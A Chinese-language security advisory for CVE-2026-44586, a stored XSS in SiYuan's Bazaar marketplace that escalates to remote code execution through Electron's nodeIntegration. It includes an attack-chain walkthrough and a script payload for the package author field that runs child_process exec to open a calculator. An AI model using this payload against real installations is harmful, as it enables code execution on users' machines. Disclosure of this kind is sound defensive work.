CVE-2026-44586 CVSS 8.3 高危

CVE-2026-44586 SiYuan存储型XSS导致RCE漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44586

漏洞类型

存储型XSS

CVSS评分

8.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

SiYuan

漏洞概述

SiYuan是一款开源个人知识管理系统。在2.1.12至3.7.0之前的版本中，Bazaar市场渲染包作者元数据时未转义，导致存储型XSS。由于桌面端Electron窗口启用了nodeIntegration且未隔离上下文，攻击者可利用该漏洞调用Node.js API，进而导致主机上的远程代码执行。

技术细节

该漏洞源于SiYuan的Bazaar市场未对包作者元数据进行HTML转义处理，导致存在存储型跨站脚本（XSS）漏洞。当用户浏览受污染的插件市场页面时，恶意脚本将在浏览器上下文中执行。关键在于，SiYuan桌面应用基于Electron构建，且其窗口配置存在严重安全隐患，具体表现为启用了`nodeIntegration: true`（允许Node.js API访问）并禁用了`contextIsolation: false`（未隔离上下文）。这种配置使得攻击者利用XSS漏洞注入的Payload能够突破沙箱限制，直接调用Node.js的`child_process`等核心模块，从而在用户操作系统上执行任意系统命令，实现从Web漏洞到本地系统权限的提升。

攻击链分析

STEP 1

1. 恶意数据注入

攻击者在SiYuan Bazaar市场发布恶意插件包，或在包的作者元数据字段中注入包含恶意JavaScript代码的HTML内容。

STEP 2

2. 数据存储与渲染

SiYuan系统获取并存储该元数据。当受害用户使用桌面客户端浏览Bazaar市场时，后端直接输出未转义的恶意HTML内容。

STEP 3

3. 触发XSS

受害者的浏览器解析恶意HTML，在当前页面上下文中触发存储型XSS，执行攻击者的JavaScript代码。

STEP 4

4. 沙箱逃逸

由于Electron窗口配置不当（nodeIntegration: true），恶意脚本通过`require('child_process')`成功加载Node.js原生模块。

STEP 5

5. 执行系统命令

攻击者代码调用Node.js API执行任意操作系统命令（如反弹Shell、安装后门），完全控制用户主机。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-44586: SiYuan Stored XSS to RCE -->
<!-- Inject this into the 'Package Author Metadata' field in Bazaar -->

<script>
  // Exploit Logic: Use XSS to execute system commands via Node.js
  // Requires: nodeIntegration: true, contextIsolation: false (Vulnerable Config)
  
  try {
    const { exec } = require('child_process');
    
    // Determine OS and execute appropriate command (e.g., open calculator)
    const cmd = process.platform === 'win32' ? 'calc.exe' : 'open -a Calculator';
    
    exec(cmd, (error, stdout, stderr) => {
      if (error) {
        console.error(`Execution Error: ${error.message}`);
        return;
      }
      console.log(`PoC Executed: ${stdout}`);
    });
  } catch (e) {
    console.log('Node.js integration not available or context isolated.');
  }
</script>

影响范围

SiYuan >= 2.1.12, < 3.7.0

防御指南

临时缓解措施

在未升级版本前，建议用户避免访问SiYuan的Bazaar市场或下载安装任何第三方插件包，以防止触发恶意元数据渲染。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表